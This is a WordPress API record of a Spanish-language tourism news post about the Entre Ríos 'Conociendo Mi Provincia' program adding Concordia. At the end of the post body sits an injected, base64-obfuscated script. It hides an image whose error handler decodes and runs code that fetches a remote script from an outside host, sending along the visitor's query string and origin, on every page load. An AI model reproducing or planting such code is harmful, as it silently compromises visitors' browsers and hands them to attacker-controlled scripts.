{"id":9351,"date":"2025-03-10T13:04:46","date_gmt":"2025-03-10T16:04:46","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9351"},"modified":"2025-08-13T15:31:15","modified_gmt":"2025-08-13T18:31:15","slug":"conociendo-mi-provincia-suma-nuevos-circuitos-turisticos-e-incorpora-a-concordia","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9351","title":{"rendered":"Conociendo Mi Provincia suma nuevos circuitos tur\u00edsticos e incorpora a Concordia"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-352d788d0be3be1afd513438f3df54b3\" style=\"background-color:#053957\"><strong><em>El programa\u00a0Conociendo Mi Provincia, impulsado por el Ministerio de Desarrollo Humano, ampl\u00eda su oferta tur\u00edstica con la incorporaci\u00f3n de Concordia como nuevo destino. La iniciativa se concreta a partir de un convenio firmado con la Corporaci\u00f3n para el Desarrollo de Salto Grande (Codesal).<\/em><\/strong><\/h5>\n\n\n\n<p>El acuerdo fue rubricado por la ministra de Desarrollo Humano, Ver\u00f3nica Berisso; la directora de Turismo Social y Educativo, Antonela Curvale; y el presidente de Codesal, Eduardo Cristina. Gracias a esta articulaci\u00f3n, el circuito en Concordia ofrecer\u00e1 visitas al Complejo Termal Ayu\u00ed y al Parque Acu\u00e1tico, brindando a los participantes, experiencias recreativas y educativas en contacto con la naturaleza.<\/p>\n\n\n\n<p>El programa\u00a0Conociendo Mi Provincia\u00a0busca fortalecer el acceso al turismo para ni\u00f1os, j\u00f3venes y adultos mayores, revalorizando el patrimonio cultural, hist\u00f3rico y natural de Entre R\u00edos. En 2024, m\u00e1s de 530 personas -entre estudiantes de escuelas primarias y secundarias, adultos mayores y personas con discapacidad- participaron en los circuitos tur\u00edsticos ya establecidos en Paran\u00e1, Gualeguay, Concepci\u00f3n del Uruguay y Diamante.<\/p>\n\n\n\n<p>Con la incorporaci\u00f3n de Concordia, la propuesta sigue creciendo y reafirmando el compromiso con un turismo accesible e inclusivo para todas las personas.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/portal.entrerios.gov.ar\/noticias\/22727\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"426\" height=\"102\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-web_8-11-2024_111525_www.entrerios.tur_.ar_.jpeg\" alt=\"\" class=\"wp-image-8896\" style=\"width:184px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-web_8-11-2024_111525_www.entrerios.tur_.ar_.jpeg 426w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-web_8-11-2024_111525_www.entrerios.tur_.ar_-300x72.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-web_8-11-2024_111525_www.entrerios.tur_.ar_-320x77.jpeg 320w\" sizes=\"(max-width: 426px) 100vw, 426px\" \/><\/a><\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El programa\u00a0Conociendo Mi Provincia, impulsado por el Ministerio de Desarrollo Humano, ampl\u00eda su oferta tur\u00edstica con la incorporaci\u00f3n de Concordia como nuevo destino. La iniciativa se concreta a partir de un convenio firmado con la Corporaci\u00f3n para el Desarrollo de Salto Grande (Codesal). El acuerdo fue rubricado por la ministra de Desarrollo Humano, Ver\u00f3nica Berisso; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9352,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-9351","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9351","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9351"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9351\/revisions"}],"predecessor-version":[{"id":9968,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9351\/revisions\/9968"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9352"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9351"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9351"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}